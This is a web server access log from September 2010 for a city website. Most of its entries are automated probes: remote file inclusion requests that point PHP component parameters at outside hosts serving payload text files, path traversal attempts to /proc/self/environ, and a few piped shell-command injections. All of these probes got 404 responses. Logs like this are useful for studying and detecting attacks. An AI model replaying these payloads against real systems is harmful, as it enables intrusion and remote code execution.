93.232.230.212 - - [01/Sep/2010:01:51:46 -0700] "GET /logs/access_091231.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:52:43 -0700] "GET /logs/access_091031.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:52:43 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:52:43 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:55:53 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:55:53 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:55:53 -0700] "GET /logs/access_100201.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:57:32 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:57:32 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:57:32 -0700] "GET /logs/access_100201.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.210.114.202 - - [01/Sep/2010:02:07:23 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
67.210.114.202 - - [01/Sep/2010:02:07:59 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
89.200.170.145 - - [01/Sep/2010:02:08:42 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
94.124.120.67 - - [01/Sep/2010:02:09:02 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.124.120.67 - - [01/Sep/2010:02:09:02 -0700] "GET /logs/access_100101.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.124.120.67 - - [01/Sep/2010:02:09:02 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
89.200.170.145 - - [01/Sep/2010:02:09:17 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
94.124.120.67 - - [01/Sep/2010:02:09:26 -0700] "GET /logs/access_091101.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.210.114.202 - - [01/Sep/2010:02:10:09 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
75.127.98.12 - - [01/Sep/2010:02:11:44 -0700] "GET /logs/access_091201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kookies.net/blog/blog/functions/response.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
75.127.98.12 - - [01/Sep/2010:02:11:44 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kookies.net/blog/blog/functions/response.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
75.127.98.12 - - [01/Sep/2010:02:11:44 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kookies.net/blog/blog/functions/response.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:02:11:48 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:02:11:48 -0700] "GET /logs/access_091101.log//agendax/addevent.inc.php?agendax_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:02:11:48 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
89.200.170.145 - - [01/Sep/2010:02:11:49 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:12:19 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:12:20 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
122.201.82.173 - - [01/Sep/2010:02:14:13 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
122.201.82.173 - - [01/Sep/2010:02:14:13 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
207.46.199.45 - - [01/Sep/2010:02:15:11 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:02:16:26 -0700] "GET /logs/access_100329.log//agendax/addevent.inc.php?agendax_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.125.71.25 - - [01/Sep/2010:02:20:11 -0700] "GET / HTTP/1.1" 200 917 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "cityofarkadelphia.com"
67.210.114.202 - - [01/Sep/2010:02:22:38 -0700] "GET /logs/access_091031.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
67.210.114.202 - - [01/Sep/2010:02:22:38 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
67.210.114.202 - - [01/Sep/2010:02:22:38 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
213.185.128.150 - - [01/Sep/2010:02:24:50 -0700] "GET /logs/access_091201.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.185.128.150 - - [01/Sep/2010:02:24:51 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.185.128.150 - - [01/Sep/2010:02:24:50 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.200.170.145 - - [01/Sep/2010:02:25:48 -0700] "GET /logs/access_091031.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
89.200.170.145 - - [01/Sep/2010:02:25:48 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
89.200.170.145 - - [01/Sep/2010:02:25:48 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
213.171.37.206 - - [01/Sep/2010:02:30:17 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
213.171.37.206 - - [01/Sep/2010:02:30:17 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:30:48 -0700] "GET /logs/access_091031.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:30:49 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:30:49 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:31:00 -0700] "GET /logs/access_091031.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:31:00 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:31:00 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
67.210.114.202 - - [01/Sep/2010:02:31:34 -0700] "GET /logs/access_091031.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
67.210.114.202 - - [01/Sep/2010:02:31:34 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
67.210.114.202 - - [01/Sep/2010:02:31:34 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
67.210.114.202 - - [01/Sep/2010:02:32:01 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
67.210.114.202 - - [01/Sep/2010:02:32:34 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
67.210.114.202 - - [01/Sep/2010:02:32:34 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
67.210.114.202 - - [01/Sep/2010:02:32:34 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:33:50 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
213.185.128.150 - - [01/Sep/2010:02:34:26 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.185.128.150 - - [01/Sep/2010:02:34:27 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.200.170.145 - - [01/Sep/2010:02:35:21 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
89.200.170.145 - - [01/Sep/2010:02:35:21 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
89.200.170.145 - - [01/Sep/2010:02:35:21 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
89.200.170.145 - - [01/Sep/2010:02:35:30 -0700] "GET /logs/access_091031.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
89.200.170.145 - - [01/Sep/2010:02:35:30 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
89.200.170.145 - - [01/Sep/2010:02:35:31 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
89.200.170.145 - - [01/Sep/2010:02:35:58 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
67.210.114.202 - - [01/Sep/2010:02:35:58 -0700] "GET /logs/access_091031.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:02:36:18 -0700] "GET /logs/access_090501.log//agendax/addevent.inc.php?agendax_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:02:36:19 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:02:36:20 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
89.200.170.145 - - [01/Sep/2010:02:39:50 -0700] "GET /logs/access_091031.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:02:40:59 -0700] "GET /logs/access_100329.log//agendax/addevent.inc.php?agendax_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.199.45 - - [01/Sep/2010:02:43:25 -0700] "GET /Downloads/?N=D HTTP/1.1" 200 671 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
109.123.102.100 - - [01/Sep/2010:02:44:09 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jimbaran.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
109.123.102.100 - - [01/Sep/2010:02:44:09 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
109.123.102.100 - - [01/Sep/2010:02:44:09 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jimbaran.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
109.123.102.100 - - [01/Sep/2010:02:44:10 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jimbaran.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
109.123.102.100 - - [01/Sep/2010:02:44:10 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
109.123.102.100 - - [01/Sep/2010:02:44:10 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
109.123.102.100 - - [01/Sep/2010:02:44:16 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jimbaran.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
109.123.102.100 - - [01/Sep/2010:02:44:16 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jimbaran.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
109.123.102.100 - - [01/Sep/2010:02:44:16 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
109.123.102.100 - - [01/Sep/2010:02:44:17 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jimbaran.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
109.123.102.100 - - [01/Sep/2010:02:44:17 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
109.123.102.100 - - [01/Sep/2010:02:44:17 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
67.210.114.202 - - [01/Sep/2010:02:46:01 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:47:27 -0700] "GET /logs/access_091031.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:47:27 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:47:28 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:47:28 -0700] "GET /logs/access_091031.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:47:28 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:47:29 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:49:29 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
188.127.248.175 - - [01/Sep/2010:02:49:32 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
89.200.170.145 - - [01/Sep/2010:02:49:47 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
213.171.37.206 - - [01/Sep/2010:02:50:29 -0700] "GET /logs/access_091231.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
83.103.72.131 - - [01/Sep/2010:02:55:24 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "cityofarkadelphia.com"
83.103.72.131 - - [01/Sep/2010:02:55:24 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:02:56:48 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:02:56:48 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:02:56:48 -0700] "GET /logs/access_100329.log//agendax/addevent.inc.php?agendax_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:02:57:07 -0700] "GET /logs/access_090501.log//agendax/addevent.inc.php?agendax_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.80.194.32 - - [01/Sep/2010:02:59:39 -0700] "GET / HTTP/1.0" 200 901 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; IE_DTPXP; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "cityofarkadelphia.com"
83.103.72.131 - - [01/Sep/2010:03:00:35 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:03:12:02 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:03:12:03 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:03:12:04 -0700] "GET /logs/access_090501.log//agendax/addevent.inc.php?agendax_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
204.188.241.2 - - [01/Sep/2010:03:12:39 -0700] "GET /logs/access_091201.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
204.188.241.2 - - [01/Sep/2010:03:12:39 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
